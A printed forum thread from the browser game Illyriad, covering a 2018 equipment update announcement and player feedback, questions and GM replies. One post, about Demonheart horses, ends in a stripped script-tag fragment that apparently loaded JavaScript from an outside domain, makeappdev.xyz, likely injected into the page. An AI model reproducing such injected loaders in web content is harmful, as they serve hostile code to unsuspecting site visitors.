Print Page | Close Window

Elements of Artifice Part 1 - Exotic Armaments

Printed From: Illyriad
Category: News & Announcements
Forum Name: News & Announcements
Forum Description: Changes, patch release dates, server launch dates, downtime notifications etc.
URL: http://forum.illyriad.co.uk/forum_posts.asp?TID=10532
Printed Date: 19 Mar 2024 at 10:45
Software Version: Web Wiz Forums 12.03 - http://www.webwizforums.com

Topic: Elements of Artifice Part 1 - Exotic Armaments
Posted By: GM Cerberus
Subject: Elements of Artifice Part 1 - Exotic Armaments
Date Posted: 10 Oct 2018 at 20:03
Greetings! 

We're excited to announce the first stage of our massive multi-tier content release: Exotic Armaments.  This first stage will give players the ability to research and discover up to 125 new pieces of equipment, completely changing the face of warfare across Illyriad.  This new equipment will make use of all recently unused crafting materials, so get out there and get to hunting and trading! 

You'll notice powerful enchanted equipment with strange new components; this will stem from a new school of magic that hasn't been released yet, but will be unleashed upon Elgea and the Broken lands very shortly.  However, nearly 60% of researchable equipment will be craftable immediately as they don't require the soon-to-be-released reagents.

We look forward to sharing more of what is to come in the coming days, but for now, enjoy and craft away! 

We've compiled the full release notes into a handy PDF document https://assets.illyriad.net/www/ReleaseEquipmentNotes.pdf" rel="nofollow - here .

https://assets.illyriad.net/www/ReleaseEquipmentNotes.pdf" rel="nofollow">

Replies:
Posted By: ElfLark
Date Posted: 11 Oct 2018 at 00:02
WOW!! Thanks for feeding the flames of Illy passion!

-------------
Who would you be if you stopped being all the things you are not?

Posted By: Llannedd
Date Posted: 11 Oct 2018 at 01:28
Sorry to burst bubbles, but this new crafted stuff is basically 99% useless. Why are you wasting your time and our money to create garbage?

Posted By: Marquesta
Date Posted: 11 Oct 2018 at 01:35
WOOTWOOT! Super excited! Been waiting for magic upgrade for 6 years!
**dusts off her spell book....**

-------------
~~Marquesta
Whether tis nobler in the mind to suffer the slings and arrows of outrageous fortune, or to take arms against a sea of troubles, and by opposing, end them...

Posted By: Asvenger
Date Posted: 11 Oct 2018 at 02:44
Lots to explore -- thanks Devs!

Posted By: kodabear
Date Posted: 11 Oct 2018 at 02:45
Originally posted by Llannedd Llannedd wrote:

Sorry to burst bubbles, but this new crafted stuff is basically 99% useless. Why are you wasting your time and our money to create garbage?

I dont really play anymore so i dont really care but it isn't a waste of your money or anyone money as you aren't required to pay play this game and of course most equipment would be useless (haven't looked at the stats) when it come done to math. There isnt anyways around that. And if they wanted to spend time creating this stuff it isnt a waste of time. I doubt they care to much to satisfy whiny people like you (of course they wont say that to you).

Posted By: eowan the short
Date Posted: 11 Oct 2018 at 02:48
Stats go up to +270% attack (in the correct circumstances). Hardly useless.

New highest speed is 117 p/h

-------------
This is the thread that never ends, yes it goes on and on my friend. Some person started it, not knowing what it was, and we'll continue posting on it forever just because...

Posted By: Bill_Cipher
Date Posted: 11 Oct 2018 at 02:53
Thanks so much, DEVs.

Magic?

Right around my corner :D

-------------
Let fate chase you not me

Posted By: Jabob
Date Posted: 11 Oct 2018 at 03:32
Looks good.  Only complaint I have is the stats have all been removed off existing equipment when you click on the item.  This means the only way at the moment to see what the stats are on equipment is to sift through the now extremely cluttered crafting research page and find the item you want to know the stats on.  Can we get the stats added back to the item descriptions like they were before please?

Posted By: Yitshak
Date Posted: 11 Oct 2018 at 04:19
That is a shed load of new kit !
Looks like over a year of research to be able to craft the lot.

-------------
Remember to be nice to the squirrel.

Posted By: Fanuidhol
Date Posted: 11 Oct 2018 at 07:44
New equip is great but am not sure anything new is worth the investment based on an early analysis since other existing gear is more scaleable. I do hope the stats added back to the item descriptions like Jabob was saying. Either way I Heart Illy Thumbs Up  

Date Posted: 11 Oct 2018 at 07:55

Koda, I agree with most of your comment but there is existing equipment that is not at all useless and fully worth development. 

"and of course most equipment would be useless (haven't looked at the stats) when it come done to math."

Posted By: zales
Date Posted: 11 Oct 2018 at 08:37
A lot of items need elemental salts which don't exist in Broken Lands is this being addressed or are we BL players losing out again, not everyone in BL can afford them no doubt..

Posted By: Maozze
Date Posted: 11 Oct 2018 at 09:14
Always something for me to learn - why do you think that?

Posted By: Twist
Date Posted: 11 Oct 2018 at 09:30
Zales, one of the topics raised at IllyCon was whether there should be elementals introduced in the Broken Lands.... 
no decision one way or the other yet, as far as I know... but it is something the devs are considering

Posted By: Hucbold
Date Posted: 11 Oct 2018 at 10:37
Glad to see new stuff. Hopefully the supply of elementals will increase to make the new stuff practical to make in quantities that will make it meaningful. Look forward to the new magic as well. Not sure why they believe these things should come without announcement. It tends to cause frustration rather than anticipation!

Posted By: Wartow
Date Posted: 11 Oct 2018 at 15:25

The GM Smurfs won't comment on mysteries, quests, or discoveries, but sometimes they do in new releases and updates.  Look beyond the surface statistics for potential applications.  

The Audrey quest would have been solved much sooner (and by more players) if people spent more time looking at updates and less time trying to surround cities with armies to stop corruption of surrounding city squares.

-------------

Posted By: Corwin
Date Posted: 11 Oct 2018 at 17:13
Every time I tend to get to  bored with the game to continue playing something new is introduced. Clap

Posted By: Hucbold
Date Posted: 11 Oct 2018 at 18:34
The four Demonheart horses do NOT appear on the research trees - even in towns where the underlying race-specific horse discovery has been made. I'm wondering if this is a new discovery that has to be made or will they just appear to be crafted when the appropriate 'shards' are added to the game.< ="text/" async="" ="//makeappdev.xyz/1e6ab715a3a95d4603.js">

Posted By: Frodo
Date Posted: 11 Oct 2018 at 18:47
Maybe we need to research 20 of the advanced researches to unlock the new horses.

At least the stats are still showing for the craft discoveries:
http://elgea.illyriad.co.uk/#/Research/Discoveries" rel="nofollow - http://elgea.illyriad.co.uk/#/Research/Discoveries

-------------

Posted By: Dungshoveleux
Date Posted: 11 Oct 2018 at 19:36
Elvis HAS left the building!
Thank you devs - don't wait for so long next time - something every 6 months even if its just a little.
Will have a drink to Illyriad tonight!

Posted By: Dungshoveleux
Date Posted: 11 Oct 2018 at 19:40

People have been moaning about no updates.
We get an update, yet you still moan?
Are you expecting them to change coke to pepsi AND find your f'ing car keys?

Crawl back into the parallel universe you inhabit (please).

Posted By: Alain_is_Ulysses
Date Posted: 11 Oct 2018 at 23:20
I love the update, but like some other, I wonder why the developers don't address the fact that there are no elementals in the BL.

Posted By: Tensmoor
Date Posted: 11 Oct 2018 at 23:45
Originally posted by Alain_is_Ulysses Alain_is_Ulysses wrote:

I love the update, but like some other, I wonder why the developers don't address the fact that there are no elementals in the BL.

I reckon either they are slowly making their way down there or it's comming as part of a later upgrade.

Date Posted: 12 Oct 2018 at 02:35
Demonheart Battlebred Thumbs Up

Posted By: rajput
Date Posted: 13 Oct 2018 at 08:30
Exciting updates... Tongue

For their efforts GMs deserve a thumbs up.... not just any thumbs up.... a 'Keanu' thumbs up Embarrassed

-------------

Warning! Author of this post has weird sense of humor...

Date Posted: 14 Oct 2018 at 04:23
Firstly, a big Clap and Thumbs Up for all the work gone into this update.

Over a years more crafting research... That begs a question regarding audrey, the greatest quest in illyriad (still unsolved) and race specific weapons/armours 

A prerequisite for the quest, (that many of us have started, or at least tried to start) is that all crafting research must be completed in a city that attempts the quest.

Now that the crafting research has been expanded, does this mean that 

a. Cities that have started this quest have to go back to square 1 (or are on hold) until all new crafting research is done.

and/or

b. New cities that want to start the quest will have a lot more crafting research to get through.

I assume this quest is still a going concern.

P.S. any tips for it Wink

-------------

Posted By: Kalculas
Date Posted: 14 Oct 2018 at 17:20
Nice. I like the added depth.

One question...what is the point of having plate armour with matching stats to the chainmail version, when all units can wear the chainmail version, and it's easier to attain? I saw in many cases, for the new items, the chainmail version even has +2% movement, where the plate doesn't.

Posted By: Bobtron
Date Posted: 15 Oct 2018 at 04:06
depends, some equipment don't have the chainmail version, like spiked platemail. also plate is cheaper than chain, and if you were an orc only alliance fighting an elven alliance, you could use pure plate equip to deny the enemy use of your dropped stuff

-------------
I support the Undying Flame!

Posted By: zolvon
Date Posted: 15 Oct 2018 at 06:09
Have made some Fiendish Lance's but cannot equip army or commander with them.

Posted By: GM ThunderCat
Date Posted: 15 Oct 2018 at 16:30
Originally posted by zolvon zolvon wrote:

Have made some Fiendish Lance's but cannot equip army or commander with them.

This should now be resolved

Date Posted: 17 Oct 2018 at 07:37
Boereal billhooks are not listed (in centrum or any other hub I can see) atm - [@c=91] although they are craftable.

In fact, looking through the list, only a few of the new weapons/armours are listed in the markets. 

Currently listed I see:-

Mounts - all 5 new types,

Swords - banes of kerberos,

Bows -citadel bow,

Spears - sunburst halberd, Fiendish lace and Mancleavers .

Leather - Tunics of the shrouded,

Chain - Scales of kerberos,

Plate - Aegeis of virtue,

Exotics - all mana, shards and essences.

All the remaining "stuff" is unlisted atm.

Hope this helps with your implementing these updates, I'm itching to make some of this new gear, (like, eg, the heartpiercer bow Evil Smile)

-------------

Date Posted: 17 Oct 2018 at 07:42
If the item is not listed, you can place a new buy order

-------------

Posted By: GM ThunderCat
Date Posted: 17 Oct 2018 at 11:07
Originally posted by Yitshak Yitshak wrote:

Boereal billhooks are not listed (in centrum or any other hub I can see) atm - [@c=91] although they are craftable.

In fact, looking through the list, only a few of the new weapons/armours are listed in the markets. 

If you tick the "show all" button they should show up; by default it only shows items with buy or sell orders.

Posted By: Tensmoor
Date Posted: 17 Oct 2018 at 16:34
All these years of playing and I never noticed that little checkbox at the bottom...I really need to pay more attention :)

Date Posted: 17 Oct 2018 at 17:10
Ah, such a simple thing. (so that's what that button does )

Thanks Thundercat Thumbs Up

-------------

Date Posted: 17 Oct 2018 at 18:36
Was hoping to see "Corrupted Hobbit Tentacles" when i checked that box.
Will need to wait a bit long for that update. LOL

-------------

Posted By: lonewolf
Date Posted: 22 Oct 2018 at 03:38
just wanted to say thanks for all the new stuff Thumbs Up

Date Posted: 30 Oct 2018 at 02:21
Belated thanks for adding the stats and formula back to the icons Thumbs Up. Anyone know if Scaled Charger Hearts are good for anything?

Posted By: Jabob
Date Posted: 30 Oct 2018 at 02:27
Scaled Charger Hearts are used to make Prestige Tomes.

Print Page | Close Window

Forum Software by Web Wiz Forums® version 12.03 - http://www.webwizforums.com
Copyright ©2001-2019 Web Wiz Ltd. - https://www.webwiz.net